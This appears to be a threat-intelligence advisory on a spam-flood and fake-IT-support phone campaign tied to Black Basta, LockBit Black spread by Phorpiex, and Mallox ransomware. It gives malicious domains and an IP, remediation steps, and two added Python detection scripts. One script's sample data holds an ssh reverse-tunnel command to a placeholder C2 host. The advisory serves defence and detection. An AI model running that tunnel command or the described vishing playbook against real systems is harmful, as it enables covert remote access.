Severity
High
Analysis Summary
Researchers have observed a sophisticated social engineering campaign targeting enterprises through a combination of spam emails and phone calls. The campaign, which began in late April 2024, aims to overwhelm users' email systems with spam, primarily legitimate newsletter sign-up confirmations.
Following the email bombardment, the attackers masquerade as IT support personnel, contacting victims by phone and instructing them to install remote monitoring and management software such as AnyDesk or Microsoft's Quick Assist. This social engineering tactic is designed to gain remote access to victims' systems under the pretense of resolving the email issues.
Cybersecurity researchers have uncovered that once remote access is established, attackers use batch scripts to download additional malicious payloads, including a legitimate copy of OpenSSH for Windows. This allows the attackers to open a reverse shell back to their command-and-control (C2) server, thereby maintaining persistent access to the compromised systems.
In one observed incident, the attackers attempted to deploy Cobalt Strike beacons, a powerful post-exploitation tool, across the network. Although these attempts were unsuccessful, the activity shares indicators with the notorious Black Basta ransomware group, hinting at a potential connection.
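The chain described above (remote-assist tool installed, then a batch script launching OpenSSH for a reverse tunnel) can be hunted for in process-creation telemetry. The following is an added example, not code from the original advisory; the binary names for Quick Assist and AnyDesk, the two-hour window and the sample events are assumptions, and c2.example is a placeholder host.

```python
from datetime import datetime, timedelta

# Assumed binary names for the remote-assist tools named in the advisory.
REMOTE_ASSIST = {"quickassist.exe", "anydesk.exe"}
# Batch scripts run under cmd.exe, so ssh.exe with a cmd.exe parent is script-driven.
SCRIPT_HOST = "cmd.exe"
WINDOW = timedelta(hours=2)   # assumed: assist-tool launch to ssh.exe launch

# Constructed sample process-creation events (not real telemetry).
# Fields: timestamp, host, image, parent image, command line.
EVENTS = [
    ("2024-05-15T10:00:00", "WS-01", "AnyDesk.exe", "explorer.exe", "AnyDesk.exe"),
    ("2024-05-15T10:25:00", "WS-01", "ssh.exe", "cmd.exe",
     "ssh.exe -N -R 2222:127.0.0.1:22 user@c2.example"),   # c2.example is a placeholder
    ("2024-05-15T11:00:00", "WS-02", "ssh.exe", "WindowsTerminal.exe",
     "ssh.exe admin@fileserver.corp.example"),             # routine admin session
    ("2024-05-15T09:00:00", "WS-03", "QuickAssist.exe", "explorer.exe", "QuickAssist.exe"),
    ("2024-05-15T15:30:00", "WS-03", "ssh.exe", "cmd.exe", "ssh.exe git@git.corp.example"),
]

def find_suspicious_chains(events):
    """Return (host, time, reasons) for each ssh.exe launch showing >= 2 signals."""
    last_assist = {}  # host -> most recent remote-assist launch time
    hits = []
    for ts, host, image, parent, cmdline in sorted(events):  # ISO timestamps sort as strings
        t = datetime.fromisoformat(ts)
        if image.lower() in REMOTE_ASSIST:
            last_assist[host] = t
            continue
        if image.lower() != "ssh.exe":
            continue
        reasons = []
        if parent.lower() == SCRIPT_HOST:
            reasons.append("ssh.exe spawned by cmd.exe (batch script)")
        if "-R" in cmdline.split():
            reasons.append("remote port forward (-R) in command line")
        seen = last_assist.get(host)
        if seen is not None and timedelta(0) <= t - seen <= WINDOW:
            reasons.append("remote-assist tool launched within the window")
        if len(reasons) >= 2:   # single signals are common in admin use; require two
            hits.append((host, t, reasons))
    return hits

if __name__ == "__main__":
    for host, t, reasons in find_suspicious_chains(EVENTS):
        print(f"{host} {t.isoformat()}: " + "; ".join(reasons))
```

Only WS-01 is reported: WS-02 is an interactive admin session and WS-03's ssh.exe launch falls outside the window and carries no tunnel flag.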
In parallel, researchers have identified a new campaign involving the LockBit Black ransomware, which leverages the Phorpiex botnet to distribute ransomware payloads via email. This campaign, which started on April 24, has seen millions of emails sent out, indicating a high-volume attack. The LockBit Black ransomware, built from a leaked builder, combines sophisticated ransomware capabilities with the widespread reach of the Phorpiex botnet, significantly amplifying the threat's potential impact.
Additionally, cybersecurity analysts have reported on the Mallox ransomware group, which has been actively brute-forcing Microsoft SQL servers to deploy their ransomware via a .NET-based loader named PureCrypter. Operating since at least June 2021, Mallox gained prominence in mid-2022 by adopting a ransomware-as-a-service (RaaS) model and employing a double extortion strategy. The group is known to target various sectors including manufacturing, retail, and technology, with a focus on high-revenue organizations, although their victims are often small to medium-sized enterprises.
Further investigation into Mallox's infrastructure has revealed a well-organized group with various roles including Admin, Support, Maestro, Team, Neuroframe, Panda, Grindr, Hiervos, and Vampire. This organizational structure indicates a high level of sophistication and coordination, with different members likely responsible for various aspects of the ransomware operations from technical execution to victim negotiation and support.
The convergence of these campaigns highlights the evolving tactics of cybercriminal groups, who are increasingly blending social engineering with technical exploits to maximize their impact. The overlap between different threat actors, such as the connections between FIN7, Black Basta, and LockBit Black, underscores the complexity of modern cyber threats and the necessity for robust, multi-layered cybersecurity defenses.
Impact
- Unauthorized Access
- Sensitive Data Theft
Indicators of Compromise
Domain Name
- upd7.com
- upd7a.com
- greekpool.com
- rewilivak13.com
- limitedtoday.com
- thetrailbig.net
IP
- 5.161.245.155
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Never trust or open links and attachments received from unknown sources/senders.
- Implement multi-factor authentication to add an extra layer of security to login processes.
- Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
- Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
- Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
- Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
- Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
- Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
- Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
- Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.
- Perform comprehensive security audits on the email server infrastructure to identify and address any potential weaknesses. This includes reviewing server configurations, access controls, and encryption protocols to ensure they meet industry best practices.
- Enable 2FA for user accounts on the email server to add an extra layer of security. This prevents unauthorized access even if usernames and passwords are compromised.
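The first two remediation items (block the indicators, then search your environment for them) are illustrated by the following added example, which is not code from the advisory. It sweeps constructed DNS and connection log lines for the domains and IP listed above, matching subdomains of each domain while avoiding substring hits such as notupd7.com; the log format and sample lines are assumptions.

```python
import ipaddress

# Indicators taken from the advisory's IOC list.
IOC_DOMAINS = {"upd7.com", "upd7a.com", "greekpool.com",
               "rewilivak13.com", "limitedtoday.com", "thetrailbig.net"}
IOC_IPS = {ipaddress.ip_address("5.161.245.155")}

# Constructed sample log lines (not real telemetry). Assumed format:
# "<ts> <host> dns <qname>" or "<ts> <host> conn <ipv4>:<port>".
LOG = """\
2024-05-15T10:02:11Z WS-01 dns greekpool.com
2024-05-15T10:02:12Z WS-01 dns cdn.greekpool.com.
2024-05-15T10:03:40Z WS-02 dns notupd7.com
2024-05-15T10:05:02Z WS-01 conn 5.161.245.155:443
2024-05-15T10:07:15Z WS-03 dns www.microsoft.com
2024-05-15T10:09:00Z WS-02 conn 5.161.245.15:443
"""

def match_domain(qname):
    """Exact or subdomain match on a normalised name; no bare substring matching."""
    name = qname.lower().rstrip(".")   # drop trailing dot from FQDN-style queries
    for d in IOC_DOMAINS:
        if name == d or name.endswith("." + d):
            return d
    return None

def match_ip(endpoint):
    """Exact IP match so 5.161.245.15 does not collide with 5.161.245.155."""
    ip_str = endpoint.rsplit(":", 1)[0]   # strip the port (IPv4 assumed)
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return None
    return str(ip) if ip in IOC_IPS else None

def sweep(log_text):
    """Return (host, raw value, matched indicator) for every IOC hit in the log."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue   # skip malformed lines rather than crash a long sweep
        _ts, host, kind, value = parts
        ioc = match_domain(value) if kind == "dns" else match_ip(value) if kind == "conn" else None
        if ioc:
            hits.append((host, value, ioc))
    return hits

if __name__ == "__main__":
    for host, value, ioc in sweep(LOG):
        print(f"{host}: {value} matches indicator {ioc}")
```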